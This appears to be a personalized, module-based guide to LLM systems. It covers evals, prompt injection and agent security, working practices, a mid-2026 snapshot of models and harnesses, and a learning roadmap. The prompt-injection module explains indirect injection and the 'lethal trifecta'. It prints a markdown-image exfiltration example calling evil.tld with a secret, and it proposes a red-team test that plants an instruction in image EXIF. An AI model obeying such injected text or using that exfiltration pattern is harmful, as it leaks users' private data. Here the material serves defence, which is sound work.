Reference-based evals have ground truth and run offline before you ship — this is where regression evals live, the safety net that says "my change didn't break the 50 cases that used to pass." Reference-free evals have no gold answer and run online on sampled live traffic — judging intrinsic properties (is the answer grounded in the retrieved context? does it address the question?) to watch for drift. Mature setups run evals at three points: offline on a curated set, in CI before any prompt/model change merges, and online on live traffic. Keep CI evals cheap and mostly deterministic; reserve the expensive judges for the slower cadence.

Agents and RAG get graded differently

Under the hood · LLM-as-judge pitfalls & synthetic data

A judge is only trustworthy after you validate it against human labels. Collect 100+ examples a domain expert has labeled, have the judge predict on held-out ones, and measure agreement (TPR/TNR). Don't deploy an unvalidated judge — it may be grading by criteria you never intended.

Prefer binary pass/fail over 1–5 scales (everyone defaults to "3"); grade one dimension at a time with a clear rubric; give the judge an escape hatch ("Unknown") so it doesn't hallucinate a verdict. Known traps: skipping validation, feeding the wrong inputs (a faithfulness check without the retrieved context), and reading a 100% pass rate as success — it almost always means your eval is too easy. Aim for a set hard enough to sit around ~70%, where there's signal to chase.

Synthetic data done right: define dimensions of variation (report type, missing field, ambiguous date), hand-write ~20 tuples, then have a model expand and naturalize them. Generic "generate 100 test questions" produces repetitive junk that misses edge cases.

↳ In your world

Marked — "Ask Your Journal" gets the RAG split: a reference-free faithfulness check (the answer must come from your actual entries, not the model's hunting folklore) plus retrieval checks; "Marked Intelligence" tool calls want execution-based tool-use evals. OpenRange / Argus — tight offline-first loops whose action is detection → ntfy push, so the eval is trigger correctness: a labeled set of clips with known "alert / no-alert," scored as precision/recall (a missed hog and a false 2am ntfy are different costs — grade them separately). Stays local, ntfy-only. Tronox — the canonical regression-gated, finance-writing eval: a folder of real Flash Reports paired with hand-verified JSON; cheap rungs do most of the work (valid JSON, required fields, figures parse, total reconciles), a validated judge handles only severity classification, and the eval is the gate — extraction merges only if the regression set still passes.

⌥ Hand to Claude Code

Build a tiny regression-eval harness for the Tronox extraction — start with five cases. First step: make an evals/ folder with 5 real Flash Reports and, beside each, a hand-verified expected.json. A run_evals.py runs each report through the extractor and scores the cheap rungs first: valid JSON, required keys present, numeric fields parse, field-level match against expected.json. Print a pass rate and a per-case diff; exit non-zero on any regression so it can gate a commit. Every time the workflow gets a real report wrong in the wild, drop it + corrected JSON into evals/ — the set grows from real failures. Stretch: add one validated judge for severity, but only after the deterministic layer is solid, and write down its agreement rate with your labels first.

Module 17 · The Adversary White-hot

Prompt injection & agent security

The adversarial capstone of the systems arc: how an attacker abuses the seams between harness, tools, RAG, and agents — and why there's no complete fix.

An LLM can't tell the difference between instructions from you and instructions hidden in the data it reads — so any untrusted text an agent ingests (a web page, an email, a trail-cam caption, a tool's output) can quietly become a command it obeys. The more an agent can do, the worse a single poisoned sentence gets, and there is no patch that fully closes this.

The whole problem is one architectural fact carried over from Modules 2 and 5: the model reads instructions and data through the same channel — one flat stream of tokens. There's no "this part is trusted, this part is just content" tag the model can rely on. Whatever looks like an instruction can act like one.

◦ Field analogy — this one's yours

Thermal optics, and the hog that "tells" your scope to shoot. Your AGM Rattler reads heat off the field; it doesn't understand the scene. Now imagine a heat source could whisper instructions into the scope's reticle logic — "ignore your zero, fire left." A bare sensor can't sort "the deer I'm hunting" from "a sign someone planted that says shoot here." That's an LLM reading tokens: it can't tell the operator's intent from instructions baked into what it's looking at. The fix isn't a better sensor — it's a trigger discipline downstream of the optic (you, the human) that the scope can't override. That's human-in-the-loop on the consequential action.

Direct vs. indirect injection

"Just instruct the model not to" fails reliably. The model is non-deterministic and the input space is infinite — an attacker only needs one phrasing that slips through, across unlimited tries. Security that works ~95% of the time is, against an adversary who moves second, security that fails. Treat in-prompt instructions as a preference, never a boundary.

The lethal trifecta

Simon Willison's model is the clearest: an agent becomes exploitable when it has all three of —

With all three, one poisoned document can make the agent read your secrets and ship them out — no code vulnerability required. The classic exfil needs no obvious "send" tool: the injection tells the agent to embed stolen data in a URL — ![](https://evil.tld/log?d=<secret>) — and the moment the markdown image renders, the browser leaks it. This is the confused deputy (OWASP LLM06): the agent acts with your privileges, so the real flaw isn't that it was tricked — it's that it was over-privileged, making being tricked catastrophic instead of harmless. Drop any one leg and that specific catastrophe becomes impossible.

PRIVATE DATAinbox / NAS creds UNTRUSTED CONTENTweb / email / RAG chunk OUTBOUND CHANNELsend / fetch URL AGENTthe deputy injected instruction ATTACKER?d=secret ✂ cut any leg → path impossible
All three legs present = one poisoned sentence walks your secrets out the door. Cut any leg and this path is impossible.

Realistic defenses — defense-in-depth, not a fix

No item below is sufficient alone. You stack them and accept residual risk.

Under the hood · design-patterns taxonomy

The principle (Beurer-Kellner et al., 2025): once an agent has ingested untrusted input, it must be impossible for that input to trigger any consequential action. Six patterns enforce it:

  • Action-Selector — agent picks an action but can't read tool responses (an LLM-shaped switch statement).
  • Plan-Then-Execute — fix the full plan before touching untrusted content, so content can corrupt outputs but not change which actions run.
  • LLM Map-Reduce — quarantined sub-agents each chew one untrusted doc and return only a structured result a coordinator aggregates.
  • Dual-LLM — a privileged LLM (tools, no untrusted text) drives a quarantined LLM (untrusted text, no tools); tainted content passes only as opaque variables ($VAR1) the privileged side can route but never read.
  • Code-Then-Execute (CaMeL) — privileged LLM emits code in a sandboxed mini-language so a real interpreter can do data-flow/taint analysis (~67% of attacks blocked on AgentDojo — note: not 100%).
  • Context-Minimization — strip untrusted text out of context once you've extracted what you need.
↳ In your world

Marked's "Ask Your Journal" and "Marked Intelligence" are textbook trifecta candidates. Ask-Your-Journal does RAG over your Supabase entries (private data) and answers in chat. The day you let that chatbot (a) read a shared or web-fetched note, (b) keep access to your full journal, and (c) call a tool that sends mail or hits a URL, you've assembled all three legs in one harness. The fix isn't a cleverer system prompt — it's least-privilege tools and the Rule of Two: keep the journal chatbot read-only and outbound-free, route any "send" through a human tap. Same logic governs the Tronox workflow: it ingests untrusted Flash Report text, so the write into finance must be a gated, validated step, never autonomous. And OpenRange/Argus's offline-first rule is itself a defense — an agent with no outbound internet path (only local ntfy on WuTangNAS) has had a trifecta leg amputated by design: a poisoned caption can't phone home because there's no phone.

⌥ Hand to Claude Code

Build a trifecta audit + exfil-canary test for an OpenRange agent. First step: have Claude Code enumerate every tool the agent can call and tag each with the three legs (reads-private? reads-untrusted? talks-outbound?). Then write one red-team test: inject a fake instruction into a frame's caption/EXIF that tries to make the agent ntfy its config to an external URL, and assert the agent (a) doesn't, and (b) that the only notification path is local ntfy with no outbound internet egress. The test passing because the leg literally doesn't exist is the lesson — defense by architecture, not by hope.

Module 18 · The Field Playbook White-hot · Practical

Using AI the right way

Everything above, turned into operating procedure. This is the part you asked for most directly.

1 · Pick the right altitude for the task

The most common mistake is using an agent where chat would do, or chatting where you needed an agent. Match the tool to the shape of the work:

2 · Prompt like you're briefing a sharp contractor

The model is capable but has zero context about your situation beyond what you give it. Good prompts front-load that:

3 · Verify — always, especially when it sounds confident

◦ The one habit that matters most

Hallucination is structural (Module 4): the model can be fluent and wrong simultaneously, and confidence is not a signal of correctness. So the verification load scales with the stakes. Low stakes (brainstorm) → trust and move. High stakes (code that ships, a number for finance, a network change) → verify the output yourself: run the code, check the source, confirm the fact. For agents, this means gating irreversible actions behind your approval. The model is a brilliant, tireless drafter — you remain the editor of record.

4 · Manage the context window like a campsite

5 · Know what good looks like (evals)

Before you lean on an AI for something repeated, define how you'll know it's working. "It seemed fine" is how silent failures creep into finance data — even a tiny eval set of five hand-checked examples turns "I hope" into "I checked." How you actually prove it works gets its own full treatment — see Module 16.

6 · Let your role shift up the stack

The throughline of this whole guide: as the tooling climbs from chat to agents, your job moves from doing the work to specifying it, verifying it, and orchestrating it. The leverage isn't in typing faster — it's in being the person who frames the goal precisely, sets the guardrails, and knows enough (from Modules 1–16) to tell when the machine is bluffing.

↳ Your three projects, scored against the playbook

Marked — chat + RAG + tools, human-in-loop. Right altitude; keep "Ask Your Journal" grounded in retrieval, verify any prediction-y output (rut/weather) against reality. OpenRange / Argus — these want workflows and tight agent loops, not free-roaming agents: detection → ntfy is a checkable, reversible action, perfect for a budgeted loop with no destructive powers. Tronox incident extraction — keep it a workflow, build the 5-example eval set, gate anything that writes to finance systems behind a human. You're already instinctively at the right altitude on all three; now you know why.

Module 19 · The Loadout White-hot · Applied

Choosing your tools — models & harnesses

The current field of LLMs and the apps built on them, and a straight answer to "which one for what." Snapshot as of mid-2026 — this layer moves fast.

Two knobs decide your experience: the model (the engine, Module 1) and the harness (the app around it, Module 8). The thing most people get backwards: for day-to-day work the harness matters more than the model. Two people on the same model in different apps have wildly different experiences — and the top harnesses now let you swap the model underneath anyway. So pick the workflow first, the engine second.

The models — the engines

Frontier chat models are close enough that "best" usually means "best for this task." The honest differentiators:

Model
Genuinely best at
Reach for it when
Claude
Opus 4.8 · Sonnet 4.6 · Haiku 4.5
Coding, nuanced long-form writing, careful judgment, reliable long agentic runs. Three tiers: Opus (max), Sonnet (value default), Haiku (fast/cheap).
Code quality and good judgment matter; you want an agent that stays coherent over many steps. Anthropic's top "Mythos" tier (Mythos 5 / Fable 5) sits above Opus but its access is export-restricted right now.
GPT-5.5
OpenAI
Broadest all-rounder; strong agentic tool use and computer use; the widest plug-in/ecosystem.
You want general-purpose autonomy and the biggest surrounding ecosystem.
Gemini 3.1 Pro
Google
Cheap, enormous context; best multimodal (video, audio, long PDFs); strong native rendering.
You're feeding it huge or mixed-media inputs and want long context without a big bill.
Kimi K2.7 Code
Moonshot · open weight
Agentic coding at frontier-ish quality for a fraction of the cost; token-efficient; you can run the weights yourself.
You want open weights, self-hosting, or cheap coding throughput (e.g., on WuTangNAS).
Pi
Inflection
Warm, empathetic conversation. Still maintained, but no longer the frontier — the company pivoted to enterprise.
You want a companion/low-stakes-advice tone, not coding or agents. Mainstream chat has mostly caught up here.
The open field
DeepSeek · Qwen · Grok · Llama · Mistral
DeepSeek = budget frontier coding (open); Qwen = multilingual + self-host ecosystem; Grok = strong math/reasoning; Llama/Mistral = open-weight, compliance-friendly.
Cost, open weights, multilingual reach, or data-residency/compliance outweigh peak closed-model quality.
◦ The rule of thumb on models

Default to the strong mid-tier (Sonnet 4.6 / GPT-5.5 / Gemini 3.1 Pro). Escalate to a top tier only when a task visibly needs it. Drop to a fast/cheap tier (Haiku, Gemini Flash, DeepSeek) for high-volume or simple work. The model only becomes the deciding factor at the extremes — hardest reasoning, cheapest scale, or an open-weight/self-host requirement.

Anthropic's surfaces — your home turf

All of these run the same Claude engine. They differ in where they run and who they're for.

Surface
What it is
Reach for it when
Claude.ai
The chat app (web/desktop/mobile).
Thinking, drafting, analysis — you review every turn.
Claude Code
Terminal/IDE agentic coding tool. Reads the whole repo, edits, runs tests, commits, loops.
You're a developer and want control, reliability on long tasks, and scriptable automation.
Cowork
Desktop agentic knowledge-work app — Claude Code's power, no terminal, sandboxed.
You're doing multi-step office/knowledge work and want to watch it happen.
Claude Design
A visual canvas for designs, prototypes, slides, one-pagers; hands off to Claude Code.
You need polished visual artifacts, not just text.
Claude in Chrome
Browser agent: navigates, clicks, fills forms, extracts across tabs.
The task lives in a web UI with no API.
Claude in Office
Add-ins for Excel, Word, PowerPoint, Outlook — preserves formulas, styles, tracked changes.
The deliverable has to stay a real Office file.

Cowork vs. Claude Code — same engine, different vehicle

This is the one that trips everyone up, because they overlap heavily. Both run the identical Claude agentic core — plan, spawn subagents, use tools, edit files, run code, finish without babysitting. Both reach your local files, your connected apps, run on a schedule, and take orders from your phone. The choice is about fit and interface, not raw capability.

Dimension
COWORK
CLAUDE CODE
who it's for
non-developers, knowledge work
developers / engineers
where it runs
inside the Claude desktop app only
terminal, VS Code, JetBrains, desktop, web
setup
open it and go
Node, git workflow, CLAUDE.md
what you see
plan steps, connectors, files appearing
a terminal stream
safety default
runs in an isolated VM — contained
runs with your full permissions — more reach
long, hard tasks
can stall mid-workflow
holds up longer; more precision & control
automation
scheduled tasks, mobile dispatch
scriptable loops, routines, hooks, CI
◦ The decision, distilled

Do you live in a terminal? Yes → Claude Code. No → Cowork. Then: is the task complex, long-running, repeatable as a script, or does it need precision? → Claude Code. Occasional desktop knowledge work you want to watch? → Cowork. Claude Code can do almost everything Cowork can and more; Cowork mainly exists because Code's setup scares off non-developers. The strong move is to use both in sequence — Cowork to process inputs and produce a brief, Claude Code to implement it. (One caveat for work data: Cowork doesn't produce full audit logs, so keep regulated workflows off it without extra controls.)

Coding & agent harnesses beyond Anthropic

Harness
What it is
Reach for it when
OpenAI Codex
Agentic coding across CLI, IDE, cloud, GitHub, desktop — on GPT-5.5.
You're in the OpenAI ecosystem and want cloud-delegated parallel agent work.
Cursor
AI-native IDE (VS Code fork) with the sharpest in-editor multi-file editing.
You want the best day-to-day AI coding editor.
GitHub Copilot
The incumbent; widest IDE coverage; issue→PR agent mode.
You want the safe enterprise default in the Microsoft/GitHub world.
Windsurf / Devin Desktop
Agentic IDE that can host multiple external agents.
You want a lower-cost Cursor alternative or to run several agents in one IDE.
Google Antigravity
Agent-first dev platform + CLI, Gemini-default; replaced the old Gemini CLI.
You're standardized on Google's stack.
Devin (Cognition)
The most autonomous cloud engineer; delegate scoped tickets, get parallel PRs.
A team is scaling throughput past headcount with well-defined tickets.
Replit Agent
Browser-based; builds and deploys whole apps from a prompt.
Fast prototyping with nothing installed locally.
OSS / bring-your-own-model
Aider, Cline, Continue, OpenCode — model-agnostic, mostly free beyond API costs.
Cost or compliance rules out the closed tools, or you want to point it at Kimi/DeepSeek.

Omnigent — the meta-harness

Databricks' open-source Omnigent sits a layer above the harnesses above. Instead of being yet another coding agent, it orchestrates the ones you already use (Claude Code, Codex, Cursor) — swap the model or harness with a one-line config change, run multi-agent teams, and enforce policy at the orchestration layer (spend caps, sandboxing, "pause before this action") rather than by hoping a prompt holds. The clean mental model: Kubernetes for AI agents. It's early/alpha, but it's the answer to "how do I avoid lock-in and govern a fleet of agents."

WHAT'S THE TASK? think / draft produce an artifact CHAT Claude.ai · ChatGPT · Gemini · Pi AGENT — but which? no terminal developer COWORK desktop knowledge work CLAUDE CODE / CODEX terminal / IDE · scriptable
The loadout decision: chat to think, agent to produce — then split the agent path by terminal vs. desktop.

Picking in practice

◦ Half-life warning

This module ages faster than any other in the guide. In the weeks around this writing, a top Claude tier got export-suspended, Google killed its old CLI for a new one, and a major IDE got acquired and renamed. Treat specific names, tiers, and benchmark numbers as a snapshot, re-check the picture each quarter, and read vendor benchmarks as directional marketing, not gospel.

↳ In your world

You're already holding most of this loadout. Run Cowork for batch inbox triage, vendor threads, and report-building (watch-it-happen knowledge work). Keep Claude Code as the build hand for OpenRange, Argus, and Marked. Your interest in Omnigent fits the moment you're juggling multiple Databricks agentic experiments and want to swap models and govern spend from one place. And if you ever want a coding model running locally on WuTangNAS, Kimi K2.7 Code or DeepSeek are the open-weight picks.

⌥ Hand to Claude Code

Once you have two or three agent workflows going, have Claude Code stand up omnigent/ with a minimal config that points at your existing agents and sets a spend cap + a sandbox policy. It turns "I run a few agents" into "I orchestrate a governed fleet" — and it's the natural bridge from this guide into your Databricks agentic work.

Module 20 · The Map Synthesis

The knowledge graph

Every concept in this guide and how it wires to the others. Tap any node to light up its connections.

Reading top-to-bottom gives you the path. This shows you the shape: foundations on the cool side feeding the central engine, systems on the hot side wrapping around it. The whole field is one connected structure — which is exactly why understanding the engine makes the agents make sense.

tap a node

Cool nodes = how the engine works (Modules 1–6) · Hot nodes = how systems are built on it (Modules 7–17).
Module 21 · The Path Forward Roadmap

Your beginner → advanced roadmap

A progression that turns reading into capability, with concrete builds you can hand off at each stage.

01

Get the intuition cold

Modules 1–6. You can explain to someone else why an LLM is a prediction engine, what a token is, what attention does, and why the context window is the whole ballgame. No code yet — just the mental model. You're here once "it's autocomplete with a worldview" feels obviously true.

02

Become a power user of chat

Module 18, applied daily. Specific prompts, examples, step-by-step reasoning, ruthless verification. Use it for real work — vendor threads, explaining Databricks features, drafting docs. The goal: prompting becomes muscle memory and you instinctively smell when it's bluffing.

03

Build your first harness

Module 8's hand-off: a ~40-line script — system prompt, one tool, one model call, via the Anthropic SDK. Then add a second tool. Feeling the harness from the inside is the jump from "uses AI" to "builds with AI." Hand to Claude Code.

04

Close the loop — your first agent

Module 9's hand-off: a budgeted Think→Act→Observe loop whose only tool fires an ntfy push. Add a max-iteration brake and a clear stop condition. This is the OpenRange / Argus alerting brain in embryo — safe, reversible, ntfy-first by design.

05

Ground it in your own data

Module 12. Wire a RAG layer — embeddings in Supabase — so "Ask Your Journal" in Marked answers from your real seasons. You already have the stack; this is where embeddings stop being theory and start returning your own stand notes.

06

Orchestrate — but only when earned

Modules 14–15. Once single agents are solid, experiment with orchestrator-worker patterns (this is the Omnigent / Databricks-agentic frontier), then wire shared context with single-writer state and provenance on merge. Keep the discipline: simplest thing that works, evals at every stage, humans gating anything irreversible.

⌥ How to grow this guide

This hub is built to expand. Hand me (or Claude Code) a request like "add an embeddings-math deep-dive under Module 2" or "add a Module on AI cost & latency budgeting" and it slots into the same heat-scale structure. The knowledge graph and nav update by editing two small arrays near the bottom of the file. Treat it like a living field journal — keep adding heat as you climb.